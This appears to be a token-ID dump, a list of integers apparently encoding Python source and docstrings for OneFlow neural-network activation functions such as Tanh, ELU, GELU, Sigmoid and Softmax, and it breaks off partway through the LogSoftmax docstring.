15506,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
823,
84,
21,
796,
5202,
13,
20471,
13,
3041,
41596,
21,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
823,
84,
21,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
685,
15,
13,
220,
657,
13,
220,
657,
13,
20,
60,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
45557,
71,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
11818,
71,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
1212,
10088,
552,
1769,
262,
8718,
65,
4160,
13875,
298,
1988,
286,
309,
22854,
13,
628,
220,
220,
220,
383,
16022,
318,
25,
628,
220,
220,
220,
11485,
10688,
3712,
628,
220,
220,
220,
220,
220,
220,
220,
503,
796,
3467,
31944,
90,
68,
61,
87,
12,
68,
36796,
12,
87,
11709,
90,
68,
61,
87,
10,
68,
36796,
12,
87,
11709,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
357,
505,
11125,
13,
51,
22854,
2599,
317,
309,
22854,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
530,
11125,
13,
51,
22854,
25,
383,
1255,
309,
22854,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
16,
11,
657,
11,
352,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
25706,
71,
796,
5202,
13,
20471,
13,
45557,
71,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
25706,
71,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
25915,
15,
13,
4304,
19707,
3682,
220,
657,
13,
220,
220,
220,
220,
220,
220,
220,
220,
657,
13,
4304,
19707,
3682,
60,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
38006,
71,
4943,
198,
31,
30238,
62,
83,
22854,
62,
404,
7203,
38006,
71,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4299,
25706,
71,
62,
404,
7,
87,
2599,
198,
220,
220,
220,
374,
37811,
1212,
10088,
552,
1769,
262,
8718,
65,
4160,
13875,
298,
1988,
286,
309,
22854,
13,
628,
220,
220,
220,
383,
16022,
318,
25,
628,
220,
220,
220,
11485,
10688,
3712,
628,
220,
220,
220,
220,
220,
220,
220,
503,
796,
3467,
31944,
90,
68,
61,
87,
12,
68,
36796,
12,
87,
11709,
90,
68,
61,
87,
10,
68,
36796,
12,
87,
11709,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
357,
505,
11125,
13,
51,
22854,
2599,
317,
309,
22854,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
530,
11125,
13,
51,
22854,
25,
383,
1255,
309,
22854,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
1330,
530,
11125,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
1330,
299,
32152,
355,
45941,
628,
220,
220,
220,
220,
220,
220,
220,
2124,
796,
45941,
13,
18747,
26933,
12,
16,
11,
657,
11,
352,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
25706,
71,
796,
5202,
13,
20471,
13,
45557,
71,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
503,
796,
25706,
71,
7,
15414,
737,
77,
32152,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
503,
25915,
15,
13,
4304,
19707,
3682,
220,
657,
13,
220,
220,
220,
220,
220,
220,
220,
220,
657,
13,
4304,
19707,
3682,
60,
628,
220,
220,
220,
37227,
198,
220,
220,
220,
1441,
11818,
71,
3419,
7,
87,
8,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
3698,
52,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
17852,
52,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
628,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
3698,
52,
92,
7,
87,
8,
796,
3467,
27471,
90,
33964,
92,
198,
197,
197,
197,
197,
87,
1222,
3467,
5239,
90,
611,
1782,
2124,
3467,
13655,
657,
220,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3467,
26591,
9,
7,
11201,
7,
87,
13219,
16,
8,
1222,
3467,
5239,
90,
611,
1782,
2124,
3467,
293,
657,
26867,
198,
220,
220,
220,
220,
197,
197,
220,
220,
220,
3467,
437,
90,
33964,
92,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
17130,
25,
262,
1058,
11018,
25,
63,
59,
26591,
63,
1988,
329,
262,
17852,
52,
31760,
13,
15161,
25,
352,
13,
15,
198,
220,
220,
220,
220,
220,
220,
220,
287,
5372,
25,
460,
42976,
466,
262,
4905,
287,
12,
5372,
13,
15161,
25,
7559,
25101,
15506,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1288,
84,
796,
5202,
13,
20471,
13,
3698,
52,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
1288,
84,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
25915,
15,
13,
2670,
2682,
3388,
2091,
220,
657,
13,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
13,
20,
220,
220,
220,
220,
220,
220,
2361,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
38,
3698,
52,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
402,
3698,
52,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
38,
417,
84,
14916,
10088,
13,
628,
220,
220,
220,
383,
16022,
318,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
503,
796,
657,
13,
20,
1635,
2124,
1635,
357,
16,
1343,
25706,
71,
38016,
31166,
17034,
31478,
31944,
90,
17,
18477,
59,
14415,
11709,
1635,
357,
87,
1343,
657,
13,
15,
34825,
1314,
87,
36796,
18,
92,
22305,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
357,
505,
11125,
13,
51,
22854,
2599,
23412,
309,
22854,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
530,
11125,
13,
51,
22854,
25,
317,
309,
22854,
13,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
20383,
84,
796,
5202,
13,
20471,
13,
38,
3698,
52,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
20383,
84,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
25915,
15,
13,
21526,
25022,
3324,
220,
657,
13,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
13,
27712,
4790,
10163,
60,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
25280,
84,
4943,
198,
31,
30238,
62,
83,
22854,
62,
404,
7203,
25280,
84,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4299,
20383,
84,
62,
404,
7,
87,
2599,
198,
220,
220,
220,
374,
37811,
38,
417,
84,
14916,
10088,
13,
628,
220,
220,
220,
383,
16022,
318,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
503,
796,
657,
13,
20,
1635,
2124,
1635,
357,
16,
1343,
25706,
71,
38016,
31166,
17034,
31478,
31944,
90,
17,
18477,
59,
14415,
11709,
1635,
357,
87,
1343,
657,
13,
15,
34825,
1314,
87,
36796,
18,
92,
22305,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
357,
505,
11125,
13,
51,
22854,
2599,
23412,
309,
22854,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
530,
11125,
13,
51,
22854,
25,
317,
309,
22854,
13,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
20383,
84,
796,
5202,
13,
20471,
13,
38,
3698,
52,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
20383,
84,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
25915,
15,
13,
21526,
25022,
3324,
220,
657,
13,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
13,
27712,
4790,
10163,
60,
628,
220,
220,
220,
37227,
198,
220,
220,
220,
1441,
402,
3698,
52,
3419,
7,
87,
8,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
50,
17225,
1868,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
311,
17225,
1868,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
50,
17225,
1868,
92,
7,
87,
8,
796,
3467,
82,
13495,
7,
87,
8,
796,
3467,
31944,
90,
16,
18477,
16,
1343,
3467,
11201,
32590,
87,
38165,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
1330,
299,
32152,
355,
45941,
628,
220,
220,
220,
220,
220,
220,
220,
2124,
796,
5202,
13,
51,
22854,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45941,
13,
18747,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
15,
13,
23,
1558,
20370,
2078,
11,
657,
13,
43690,
22291,
1795,
11,
657,
13,
940,
2327,
1415,
2078,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25915,
16,
13,
1314,
31046,
26492,
11,
532,
15,
13,
3134,
39509,
29703,
11,
657,
13,
1983,
36720,
19880,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
285,
796,
5202,
13,
20471,
13,
50,
17225,
1868,
3419,
1303,
393,
331,
796,
5202,
13,
82,
17225,
1868,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
331,
796,
285,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16410,
15,
13,
3388,
32459,
39647,
11,
657,
13,
31980,
2327,
45758,
11,
657,
13,
20,
25600,
2816,
2780,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
685,
15,
13,
23516,
2857,
33981,
11,
657,
13,
2091,
3134,
1899,
2816,
11,
657,
13,
49211,
28041,
1828,
11907,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
82,
17225,
1868,
4943,
198,
31,
30238,
62,
83,
22854,
62,
404,
7203,
82,
17225,
1868,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4299,
264,
17225,
1868,
62,
404,
7,
87,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
50,
17225,
1868,
92,
7,
87,
8,
796,
3467,
82,
13495,
7,
87,
8,
796,
3467,
31944,
90,
16,
18477,
16,
1343,
3467,
11201,
32590,
87,
38165,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
1330,
299,
32152,
355,
45941,
628,
220,
220,
220,
220,
220,
220,
220,
2124,
796,
5202,
13,
51,
22854,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45941,
13,
18747,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
15,
13,
23,
1558,
20370,
2078,
11,
657,
13,
43690,
22291,
1795,
11,
657,
13,
940,
2327,
1415,
2078,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25915,
16,
13,
1314,
31046,
26492,
11,
532,
15,
13,
3134,
39509,
29703,
11,
657,
13,
1983,
36720,
19880,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
331,
796,
2124,
13,
82,
17225,
1868,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16410,
15,
13,
3388,
32459,
39647,
11,
657,
13,
31980,
2327,
45758,
11,
657,
13,
20,
25600,
2816,
2780,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
685,
15,
13,
23516,
2857,
33981,
11,
657,
13,
2091,
3134,
1899,
2816,
11,
657,
13,
49211,
28041,
1828,
11907,
628,
220,
220,
220,
37227,
198,
220,
220,
220,
1441,
311,
17225,
1868,
3419,
7,
87,
8,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
39,
1371,
17225,
1868,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
367,
1371,
17225,
1868,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
39,
1371,
17225,
1868,
92,
7,
87,
8,
796,
3467,
27471,
90,
33964,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
1222,
3467,
5239,
90,
611,
1782,
2124,
3467,
293,
532,
18,
220,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
352,
1222,
3467,
5239,
90,
611,
1782,
2124,
3467,
469,
1343,
18,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3467,
31944,
90,
87,
18477,
21,
92,
1343,
3467,
31944,
90,
16,
18477,
17,
92,
1222,
3467,
5239,
90,
4306,
1782,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
437,
90,
33964,
92,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
287,
5372,
25,
460,
42976,
466,
262,
4905,
287,
12,
5372,
13,
15161,
25,
7559,
25101,
15506,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1327,
82,
17225,
1868,
796,
5202,
13,
20471,
13,
39,
1371,
17225,
1868,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
1327,
82,
17225,
1868,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
685,
15,
13,
35218,
19060,
21,
657,
13,
20,
220,
220,
220,
220,
220,
220,
220,
657,
13,
3365,
2091,
20370,
2361,
198,
220,
220,
220,
220,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
18380,
9806,
4943,
198,
31,
23100,
9134,
62,
15042,
628,
198,
31,
505,
11125,
62,
39344,
7203,
4215,
9806,
4943,
198,
31,
30238,
62,
83,
22854,
62,
404,
7203,
4215,
9806,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4299,
2705,
9806,
62,
404,
7,
83,
22854,
11,
5391,
28,
14202,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
8297,
9806,
2163,
284,
281,
299,
12,
19577,
5128,
309,
22854,
198,
220,
220,
220,
6811,
4272,
606,
523,
326,
262,
4847,
286,
262,
299,
12,
19577,
5072,
309,
22854,
198,
220,
220,
220,
6486,
287,
262,
2837,
685,
15,
11,
16,
60,
290,
2160,
284,
352,
13,
628,
220,
220,
220,
8297,
9806,
318,
5447,
355,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
18380,
9806,
92,
7,
87,
23330,
72,
30072,
796,
3467,
31944,
31478,
11201,
7,
87,
62,
72,
8,
18477,
59,
16345,
62,
73,
3467,
11201,
7,
87,
62,
73,
38165,
628,
220,
220,
220,
1649,
262,
5128,
309,
22854,
318,
257,
29877,
11192,
273,
788,
262,
555,
16684,
361,
276,
198,
220,
220,
220,
3815,
389,
5716,
355,
7559,
12,
10745,
15506,
13,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
28104,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
28104,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
257,
309,
22854,
286,
262,
976,
15793,
290,
5485,
355,
262,
5128,
351,
198,
220,
220,
220,
220,
220,
220,
220,
3815,
287,
262,
2837,
685,
15,
11,
352,
60,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5391,
357,
600,
2599,
317,
15793,
1863,
543,
8297,
9806,
481,
307,
29231,
357,
568,
790,
16416,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1863,
5391,
481,
2160,
284,
352,
737,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
1330,
530,
11125,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
1330,
299,
32152,
355,
45941,
628,
220,
220,
220,
220,
220,
220,
220,
285,
796,
5202,
13,
20471,
13,
18380,
9806,
7,
27740,
796,
362,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
796,
5202,
13,
51,
22854,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45941,
13,
18747,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
16410,
30109,
12,
15,
13,
24669,
1433,
34583,
11,
220,
657,
13,
21844,
11623,
2682,
11,
220,
657,
13,
21,
28296,
11245,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25915,
16,
13,
27970,
31911,
3388,
11,
532,
15,
13,
32114,
2078,
49641,
11,
220,
352,
13,
2857,
3865,
2548,
3980,
11907,
4357,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
16410,
58,
352,
13,
48891,
41019,
3682,
11,
532,
15,
13,
2920,
2548,
1270,
4310,
11,
220,
352,
13,
3459,
22291,
19707,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
352,
13,
2327,
2327,
1433,
1828,
11,
532,
16,
13,
3510,
1495,
1065,
5332,
11,
532,
16,
13,
1821,
2425,
1485,
4524,
11907,
11907,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
331,
796,
285,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16410,
30109,
15,
13,
47325,
3553,
2414,
220,
657,
13,
3388,
38605,
3270,
220,
657,
13,
26561,
1821,
22370,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
685,
15,
13,
6200,
19,
24940,
220,
657,
13,
21288,
1821,
26200,
657,
13,
2154,
25191,
3324,
2361,
11907,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
16410,
58,
15,
13,
19,
24991,
45758,
220,
657,
13,
22,
1731,
5332,
3104,
220,
657,
13,
4846,
1821,
4761,
1558,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
685,
15,
13,
39322,
1954,
28857,
657,
13,
23195,
21139,
1731,
657,
13,
15,
30743,
1983,
3720,
11907,
11907,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1441,
8297,
9806,
7,
27740,
5769,
83,
22854,
8,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
11187,
18380,
9806,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
5972,
18380,
9806,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
1058,
11018,
25,
63,
59,
6404,
38016,
5239,
90,
18380,
9806,
92,
7,
87,
4008,
63,
2163,
284,
281,
299,
12,
19577,
198,
220,
220,
220,
5128,
309,
22854,
13,
198,
220,
220,
220,
383,
5972,
18380,
9806,
31760,
460,
307,
27009,
355,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
11187,
18380,
9806,
92,
7,
87,
23330,
72,
30072,
796,
3467,
6404,
59,
9464,
38016,
31944,
31478,
11201,
7,
87,
62,
72,
8,
1782,
90,
3467,
16345,
62,
73,
